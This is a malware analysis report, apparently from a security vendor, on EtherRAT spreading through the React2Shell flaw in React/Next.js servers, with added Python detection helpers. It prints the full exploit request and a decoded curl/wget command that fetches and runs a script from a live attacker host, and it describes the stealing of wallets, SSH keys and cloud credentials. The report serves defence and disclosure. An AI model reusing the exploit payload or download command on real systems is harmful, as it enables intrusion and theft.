Distribution of EtherRAT Malware Exploiting React2Shell Vulnerability (CVE-2025-55182)
AhnLab SEcurity intelligence Center (ASEC) recently discovered an advanced malware distribution campaign using Node.js while tracking the recently disclosed React2Shell vulnerability. This attack installs EtherRAT through multiple stages, with the ultimate goal of gaining a foothold, stealing information, and stealing cryptocurrency.
After the threat actor connected to the target IP address on port 80, they immediately sent the React2Shell exploit packet. The attacks are launched by an automated script and do not target specific countries; they are aimed at randomly generated IP addresses instead. The packets used in the attacks are shown below.
- First Access

Header:

```http
GET / HTTP/1.1
Host: { IP Address }
Connection: keep-alive
```
- Vulnerability Exploit

Header:

```http
POST / HTTP/1.1
Host: { IP Address }
Content-Type: multipart/form-data; boundary=----R2gc3yr5k1ev
Next-Action: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Connection: keep-alive
Transfer-Encoding: chunked
```

Data:

```
------R2gc3yr5k1ev
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","value":"{\"then\":\"$B1337\"}","reason":-1,"_response":{"_prefix":"var cp=process.mainModule.require(\"child_process\");try{cp.exec(\"echo KGN1cmwgLXMgaHR0cDovLzE5My4yNC4xMjMuNjg6MzAwMS9nZmRzZ3NkZmhmc2RfZ2hzZmRnc2ZkZ3NkZmcuc2ggLW8gL3RtcC9zLnNofHx3Z2V0IC1xIC1PIC90bXAvcy5zaCBodHRwOi8vMTkzLjI0LjEyMy42ODozMDAxL2dmZHNnc2RmaGZzZF9naHNmZGdzZmRnc2RmZy5zaCkmJmNobW9kICt4IC90bXAvcy5zaCYmL3RtcC9zLnNoICY=|base64 -d|sh\")}catch{}\"ok\"//","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------R2gc3yr5k1ev
Content-Disposition: form-data; name="1"

$@0
------R2gc3yr5k1ev
Content-Disposition: form-data; name="2"

[]
------R2gc3yr5k1ev--
```
If the exploit packet reaches a vulnerable React server, the following command is executed.

```sh
(curl -s http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh -o /tmp/s.sh||wget -q -O /tmp/s.sh http://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh)&&chmod +x /tmp/s.sh&&/tmp/s.sh
```
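The packet above gives a defender concrete strings to look for: the Flight payload markers in the multipart body and the `echo <base64>|base64 -d|sh` stager inside the `exec()` call. The following Python helper is an added example, not code from the ASEC post; it classifies a raw HTTP request by those markers and recovers the wrapped shell stage. The sample request, its boundary and its host are constructed (not the captured packet).

```python
import base64
import re

# Body strings the React2Shell payload above relies on (taken from the captured packet).
PAYLOAD_MARKERS = ("$1:__proto__:then", "$1:constructor:constructor",
                   "process.mainModule.require")
# A Next-Action header carrying a 40-hex-char action ID, as in the packet.
NEXT_ACTION_RE = re.compile(r"^next-action:\s*[0-9a-f]{40}\s*$", re.I | re.M)
# The "echo <base64>|base64 -d|sh" stager wrapped inside the exec() call.
STAGER_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+-d\s*\|\s*sh")

def inspect_request(raw: str) -> dict:
    """Classify one raw HTTP request and recover any base64-wrapped shell stage."""
    head, _, body = raw.partition("\r\n\r\n")
    indicators = [m for m in PAYLOAD_MARKERS if m in body]
    if NEXT_ACTION_RE.search(head):
        indicators.append("next-action header with 40-hex action id")
    staged = []
    for b64 in STAGER_RE.findall(body):
        try:
            staged.append(base64.b64decode(b64, validate=True).decode())
        except (ValueError, UnicodeDecodeError):
            staged.append("<undecodable stage>")
    # Require a body marker: legitimate Server Actions also send Next-Action.
    suspicious = any(m in PAYLOAD_MARKERS for m in indicators)
    return {"suspicious": suspicious, "indicators": indicators, "staged_commands": staged}

# Constructed sample traffic (not the page's packet): same structure, placeholder host.
SAMPLE_STAGE = "(curl -s http://c2.invalid:3001/s.sh -o /tmp/s.sh)&&sh /tmp/s.sh"
_B64 = base64.b64encode(SAMPLE_STAGE.encode()).decode()
EXPLOIT_REQUEST = (
    "POST / HTTP/1.1\r\nHost: 203.0.113.10\r\n"
    "Content-Type: multipart/form-data; boundary=----xyz\r\n"
    "Next-Action: " + "a" * 40 + "\r\nTransfer-Encoding: chunked\r\n\r\n"
    '------xyz\r\nContent-Disposition: form-data; name="0"\r\n\r\n'
    '{"then":"$1:__proto__:then","status":"resolved_model","_response":{"_prefix":'
    '"var cp=process.mainModule.require(\\"child_process\\");try{cp.exec(\\"echo '
    + _B64 + '|base64 -d|sh\\")}catch{}\\"ok\\"//",'
    '"_formData":{"get":"$1:constructor:constructor"}}}\r\n------xyz--\r\n'
)
BENIGN_REQUEST = "GET / HTTP/1.1\r\nHost: 203.0.113.10\r\nConnection: keep-alive\r\n\r\n"
```

Run `inspect_request` over each request body captured by a reverse proxy or WAF log to surface the staged command without executing it.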
The "gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh" file downloaded from the C2 installs Node.js (v20.10.0) in a specific system path, creates an encrypted data file and a Node.js script, and then executes them.
The Node.js script executed in this process decrypts the encrypted data file using AES and then executes it. The result of the data file decryption is another Node.js script, which is a malware called EtherRAT. This malware connects to the C2 server periodically and can execute commands.
The main feature of EtherRAT is how it obtains the C2 address. It queries an Ethereum contract and extracts the C2 string from the data. The following figure shows the Ethereum contract information and the domain used to query this information.

Figure 1. Ethereum contract information and query domain
Querying the contract with this information returns the C2 string, as shown below.

Figure 2. Contract query result
- C2: hxxp://91.215.85[.]42:3000
The C2 URL is created by combining the C2 address obtained through contract lookup, the extensions [png, jpg, gif, css, ico, webp], a randomly generated string, and the variable names [id, token, key, b, q, s, v].

Figure 3. C2 URL generation
This malware strain periodically connects to the C2 and executes the commands it receives. At the time of analysis, the C2 responded with a total of 5 additional malicious scripts, which the malware executed. These scripts steal cryptocurrency wallets, register SSH keys, propagate to other hosts, redirect traffic, and exfiltrate information.
The details of the 5 additional scripts served by the C2 follow. Notably, some of these scripts contain code written in Russian as well as code that excludes systems in former Soviet Union countries from attack.
Registering SSH Access Key
Installs an SSH key to maintain access to the compromised system. The key is as follows.

```
ssh-rsa [key material omitted] root@vps
```
The script contains an error message in Russian.

Figure 4. Error handling code (Russian)
Propagation
Scans randomly generated IP addresses on ports [80, 443, 3000, 3001, 8080, 8443] and attacks them. This attack does not target any specific country.

Figure 5. Code for generating a random IP
On initial access, a GET request is sent. The response is then examined, and if it meets the following conditions, a React exploit packet is sent.

| Check | Strings |
|---|---|
| Header | `x-powered-by: Next.js`, `x-nextjs-page:` |
| Body | `/_next/`, `__NEXT_DATA__` |
[Redirection]
While the script is running, it redirects incoming HTTP requests to a specific URL and sends system information to a webhook address. Accessing the IP address of an identified attack target redirects the visitor to that page. This is interpreted as a measure to stop other scanners from exploiting the vulnerability on the already compromised host.

Figure 6. Information of the redirection packet that responds from the infected system
- Redirection URL: https://xss.pro
- Webhook URL: hxxps://webhook[.]site/63575795-ee27-4b29-a15d-e977e7dc8361
Information Theft
The malware steals system information and transmits it to the C2. It collects details such as OS information, domain information, the installed AV product, and VGA information. It also checks the system's locale and performs no further action if it matches the country code of any of the following countries.
- ru: Russia
- be: Belarus
- kk: Kazakhstan
- ky: Kyrgyzstan
- tg: Tajikistan
- UZ: Uzbekistan
- hy: Armenia
- az: Azerbaijan
- ka: Georgia

Figure 7. Code to check the infected system’s locale
- Transmission URL: hxxp://91.215.85[.]42:3000/{identifier}
[Cryptocurrency Theft]
It collects files related to cryptocurrency wallets, SSH keys, cloud configuration, and console history and transmits them to the C2. In particular, it scans files for the full list of 2048 BIP39 mnemonic words used for cryptocurrency wallet recovery, and any file containing wallet-related strings is also targeted for exfiltration. It scans multiple directories and then transmits the matched file names and their contents to the C2 below.

Figure 8. File collection code
- Transmission URL: hxxp://91.215.85[.]42:3000/crypto/keys
Threat actors exploit such information to launch actual attacks. It is advised to monitor security advisories and keep products up to date with the latest versions.
[Response Guide]
1. Check NodeJS
During the attack, NodeJS version v20.10.0 is installed and executed. If a suspicious NodeJS process is running in a path that was not installed separately, malware infection should be suspected.
The directory used in this attack is shown below and may change continuously.
[Path to Create Node.js Script]
- $HOME/.local/share/.05bf0e9b
Installation Path of Node
- $HOME/.local/share/.05bf0e9b/.4dai8ovb/bin/node
2. Check the access history of Ethereum contract queries
Check the access history of the following URL via HTTPS.
When a contract is queried, the following data is exchanged.
- HTTPS POST Request Data

```json
{
  "jsonrpc": "2.0",
  "method": "eth_call",
  "params": [
    {
      "to": "0x22f96d61cf118efabc7c5bf3384734fad2f6ead4",
      "data": "0x7d434425000000000000000000000000e941a9b283006f5163ee6b01c1f23aa5951c4c8d"
    },
    "latest"
  ],
  "id": 1
}
```

- Response Data (Variable)

```json
{
  "id": 1,
  "jsonrpc": "2.0",
  "result": "0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000018687474703a2f2f39312e3231352e38352e34323a333030300000000000000000"
}
```
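The `result` above is an ABI-encoded string: a 32-byte offset, a 32-byte length, then the bytes padded to 32. The following Python helper is an added example, not code from the ASEC post; it recognises an `eth_call` to the contract in a JSON-RPC log and decodes that layout back into the C2 string. The contract address, calldata and result are the page's values (the result is written as its three 32-byte words); the JSON wrapper is re-typed here.

```python
import json

# Values from the response guide above: contract, calldata (selector + left-padded
# address argument) and the result written as its three 32-byte words.
C2_CONTRACT = "0x22f96d61cf118efabc7c5bf3384734fad2f6ead4"
CALLDATA = "0x7d434425" + "00" * 12 + "e941a9b283006f5163ee6b01c1f23aa5951c4c8d"
RESULT = ("0x" + "00" * 31 + "20"                    # offset of the string data: 32
          + "00" * 31 + "18"                         # string length: 24 bytes
          + "687474703a2f2f39312e3231352e38352e34323a33303030" + "00" * 8)  # data + padding

def decode_abi_string(result_hex: str) -> str:
    """Decode a single ABI-encoded dynamic string (offset, length, padded bytes)."""
    raw = bytes.fromhex(result_hex.removeprefix("0x"))
    if len(raw) < 64 or len(raw) % 32:
        raise ValueError("malformed ABI return data")
    offset = int.from_bytes(raw[:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    data = raw[offset + 32:offset + 32 + length]
    if len(data) != length:
        raise ValueError("declared length exceeds return data")
    return data.decode("utf-8")

def parse_calldata(data_hex: str):
    """Split eth_call calldata into its 4-byte selector and any address arguments."""
    raw = bytes.fromhex(data_hex.removeprefix("0x"))
    selector = "0x" + raw[:4].hex()
    words = [raw[i:i + 32] for i in range(4, len(raw), 32)]
    # A 20-byte address argument is left-padded with 12 zero bytes.
    addresses = ["0x" + w[12:].hex() for w in words if len(w) == 32 and w[:12] == bytes(12)]
    return selector, addresses

def check_rpc_exchange(request_json: str, response_json: str) -> dict:
    """Flag an eth_call to the EtherRAT contract and recover the C2 string it returns."""
    req, resp = json.loads(request_json), json.loads(response_json)
    call = req.get("params", [{}])[0] if req.get("method") == "eth_call" else {}
    to = str(call.get("to", "")).lower()
    selector, addresses = parse_calldata(call.get("data", "0x"))
    c2 = decode_abi_string(resp["result"]) if to == C2_CONTRACT else None
    return {"ether_rat_query": to == C2_CONTRACT, "selector": selector,
            "argument_addresses": addresses, "c2": c2}

REQUEST_JSON = json.dumps({"jsonrpc": "2.0", "method": "eth_call",
                           "params": [{"to": C2_CONTRACT, "data": CALLDATA}, "latest"],
                           "id": 1})
RESPONSE_JSON = json.dumps({"id": 1, "jsonrpc": "2.0", "result": RESULT})
```

Because the C2 string lives in the response body rather than in any URL, an egress proxy that only logs request lines will not show it; decoding the `eth_call` result is what reveals the current C2.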
3. Check C2 connection logs
This attack is currently being conducted through the following C2, which may change continuously.